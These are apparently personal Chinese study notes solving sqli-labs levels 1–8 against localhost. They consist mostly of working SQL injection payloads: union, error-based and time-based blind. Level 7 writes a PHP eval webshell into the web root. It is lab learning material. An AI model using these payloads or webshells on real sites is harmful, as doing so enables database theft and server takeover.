sqlilab草稿

文章目录

因为某种原因复制执行可能会出错建议敲一遍

Less1

3个字段
db = security

table = emails
column= email_id id

table = referers
column=id referer ip_address

http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name='referers' limit 3,4--+

http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1--+

table = uagents users
column=id uagent ip_address username id username password

Less2

3个字段
http://localhost/sqli-labs-master/Less-2/?id=1 order by 4–+
db = security

http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,table_name,3 from information_schema.tables--+

table=emails

http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1--+

column=id

http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,id,3 from emails limit 0,1--+

Less3

select * from table where id = (’ input ');

http://localhost/sqli-labs-master/Less-3/?id=1') order by 4--+

Less4

select * from table where id = (" input ");

http://localhost/sqli-labs-master/Less-4/?id=1") order by 4%23

http://localhost/sqli-labs-master/Less-4/?id=-1") union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='database()')--+

union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='database()')--+

Less5

报错注入可以回显
http://localhost/sqli-labs-master/Less-5/?id=1’order by 4%23

http://localhost/sqli-labs-master/Less-5/?id=1’ and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,database(),0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);--+

Less6

http://localhost/sqli-labs-master/Less-6/?id=1" order by 4–+

and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='emails' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);

http://localhost/sqli-labs-master/Less-6/?id=1"and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='emails' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);--+

database=security
table= emails

Less7

因为php脚本语言的原因，能识别的解析变量的字符就那几个，单引号、双引号、括号等
http://localhost/sqli-labs-master/Less-7/?id=1’))–+

http://localhost/sqli-labs-master/Less-7/?id=1’)) union select version(),database(),user() into outfile'd:\\3.txt'--+
在d盘根目录下输出了3.txt，内容是version(),database(),user()

http://localhost/sqli-labs-master/Less-7/?id=1’)) union select 1,2,"<?php @eval($_POST['test']);?>" into outfile'd:\\phpstudy_pro\\WWW\\1.php'--+
此payload将一句话木马写进服务器，然后可以用中国菜刀连接

Less8

用延时盲注
先看字段长度
?id=1’ order by 4–+
3正常回显，4没有回显，说明有三个字段

猜解数据库长度
http://localhost/sqli-labs-master/Less-8/?id=1’ and if(length(database())=2,sleep(5),1)--+
bp**
8个字母

猜解数据库名
http://localhost/sqli-labs-master/Less-8/?id=1’ and if(ascii(mid(database(),1,1))=1,sleep(5),1)--+
bp**。二分法
115 101 99 117 114 105 116 121 库名
security

猜解数据库中表的数量
http://localhost/sqli-labs-master/Less-8/?id=1’ and if((select count(table_name) from information_schema.tables where table_schemas=database())=1,sleep(5),1)--+

http://localhost/sqli-labs-master/Less-8/?id=1’ and if((select count(table_name) from information_schema.tables where table_schema=database())=1,sleep(5),1)--+
**，发现是四个表

http://localhost/sqli-labs-master/Less-8/?id=1’ and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1)--+
**猜解表名长度
6

http://localhost/sqli-labs-master/Less-8/?id=1’ and if((select ascii(substr((select table_name from information_schema.tables where table_schema= database() limit 0,1),1,1)))=1,sleep(5),1)--+
猜解表名（利用bp**的cluster bomb方法）
101 109 97 105 108 115 = emails

http://localhost/sqli-labs-master/Less-8/?id=1’ and if((select count(column_name) from information_schema.columns where table_name='emails')=1,sleep(5),1)--+
猜解字段数
2个字段

先看字段长度呗
http://localhost/sqli-labs-master/Less-8/?id=1’ and if(length(substr((select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),1))=1,sleep(5),1)--+
第一个字段长度为2
第二个字段长度为8

http://localhost/sqli-labs-master/Less-8/?id=1’ and if((select ascii(substr((select column_name from information_schema.columns where table_schema= database() and table_name='emails' limit 0,1),1,1)))=1,sleep(5),1)--+
猜解字段
第一个105 100 id
第二个101 109 97 105 108 95 105 100 email_id

http://localhost/sqli-labs-master/Less-8/?id=1’ and if((select length((select id from emails limit 0,1))=1),sleep(5),1)--+
判断id列下第一个内容的长度 1

http://localhost/sqli-labs-master/Less-8/?id=1’ and if((select length((select email_id from emails limit 0,1))=1),sleep(5),1)--+
判断email_id列下第一个内容的长度 16

http://localhost/sqli-labs-master/Less-8/?id=1’ and if((select ascii(substr((select email_id from emails limit 0,1),1,1))=10),sleep(5),1)--+
**得出email_id列下的第一个内容
sqlilab草稿